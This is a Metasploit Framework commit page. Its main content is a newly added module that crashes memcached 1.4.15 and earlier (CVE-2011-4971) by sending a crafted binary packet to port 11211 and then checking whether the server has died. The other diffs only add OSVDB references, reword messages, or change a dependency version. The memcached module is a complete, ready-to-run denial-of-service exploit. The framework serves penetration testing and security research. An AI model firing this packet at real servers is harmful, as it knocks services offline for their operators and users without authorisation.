Skip to content

Commit 6c01326

Browse files
David MaloneyDavid Maloney
authored andcommitted
Merge branch 'master' into feature/mdm_version_bump
Conflicts: Gemfile Gemfile.lock
2 parents 504d52c + 3111013 commit 6c01326

17 files changed

+482
-25
lines changed

Gemfile.lock

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -65,7 +65,7 @@ DEPENDENCIES
6565
database_cleaner
6666
factory_girl (>= 4.1.0)
6767
json
68-
metasploit_data_models (~> 0.16.0)
68+
metasploit_data_models (~> 0.15.2)
6969
msgpack
7070
nokogiri
7171
pcaprub
Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# web site for more information on licensing and terms of use.
5+
# http://metasploit.com/
6+
##
7+
8+
9+
require 'msf/core'
10+
11+
12+
class Metasploit3 < Msf::Auxiliary
13+
14+
include Msf::Exploit::Remote::Tcp
15+
include Msf::Auxiliary::Dos
16+
17+
def initialize(info = {})
18+
super(update_info(info,
19+
'Name' => 'Memcached Remote Denial of Service',
20+
'Description' => %q{
21+
This module sends a specially-crafted packet to cause a
22+
segmentation fault in memcached v1.4.15 or earlier versions.
23+
},
24+
'References' =>
25+
[
26+
[ 'URL', 'https://code.google.com/p/memcached/issues/detail?id=192' ],
27+
[ 'CVE', '2011-4971' ],
28+
[ 'OSVDB', '92867' ]
29+
],
30+
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
31+
'License' => MSF_LICENSE
32+
))
33+
34+
register_options([Opt::RPORT(11211),], self.class)
35+
end
36+
37+
def is_alive?
38+
begin
39+
connect
40+
disconnect
41+
rescue Rex::ConnectionRefused
42+
return false
43+
end
44+
45+
return true
46+
end
47+
48+
def run
49+
connect
50+
pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"
51+
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
52+
pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
53+
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
54+
55+
print_status("#{rhost}:#{rport} - Sending dos packet...")
56+
sock.put(pkt)
57+
disconnect
58+
59+
print_status("#{rhost}:#{rport} - Checking host status...")
60+
select(nil, nil, nil, 1)
61+
62+
if is_alive?
63+
print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
64+
else
65+
print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?
66+
end
67+
end
68+
end

modules/auxiliary/scanner/couchdb/couchdb_login.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ def initialize(info={})
1818
super(update_info(info,
1919
'Name' => 'CouchDB Login Utility',
2020
'Description' => %{
21-
This module will test CouchDB logins on a range of
21+
This module tests CouchDB logins on a range of
2222
machines and report successful logins.
2323
},
2424
'Author' =>

modules/auxiliary/scanner/http/svn_scanner.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -117,7 +117,7 @@ def run_host(target_host)
117117
print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}")
118118
end
119119
else
120-
print_status("[#{target_host}] SVN Entries file found.")
120+
print_good("[#{target_host}:#{rport}] SVN Entries file found.")
121121

122122
report_web_vuln(
123123
:host => target_host,

modules/exploits/linux/http/esva_exec.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -29,6 +29,7 @@ def initialize(info={})
2929
],
3030
'References' =>
3131
[
32+
[ 'OSVDB', '85462'],
3233
[ 'BID', '55050'],
3334
[ 'EDB', '20551' ]
3435
],

modules/exploits/linux/http/mutiny_frontend_upload.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35,6 +35,7 @@ def initialize(info = {})
3535
'References' =>
3636
[
3737
[ 'CVE', '2013-0136' ],
38+
[ 'OSVDB', '93444' ],
3839
[ 'US-CERT-VU', '701572' ],
3940
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
4041
],

modules/exploits/linux/http/symantec_web_gateway_exec.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -30,6 +30,7 @@ def initialize(info={})
3030
'References' =>
3131
[
3232
[ 'CVE', '2012-0297' ],
33+
[ 'OSVDB', '82925' ],
3334
[ 'BID', '53444' ],
3435
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
3536
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]

modules/exploits/linux/http/vcms_upload.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -36,6 +36,7 @@ def initialize(info={})
3636
'References' =>
3737
[
3838
['CVE', '2011-4828'],
39+
['OSVDB', '77183'],
3940
['BID', '50706'],
4041
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
4142
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']

modules/exploits/linux/local/kloxo_lxsuexec.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -46,6 +46,7 @@ def initialize(info={})
4646
'References' =>
4747
[
4848
[ 'EDB', '25406' ],
49+
[ 'OSVDB', '93287' ],
4950
[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
5051
],
5152
'Targets' =>

modules/exploits/linux/local/sock_sendpage.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -62,6 +62,7 @@ def initialize(info={})
6262
'References' =>
6363
[
6464
[ 'CVE', '2009-2692' ],
65+
[ 'OSVDB', '56992' ],
6566
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
6667
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
6768
],

0 commit comments

Comments
 (0)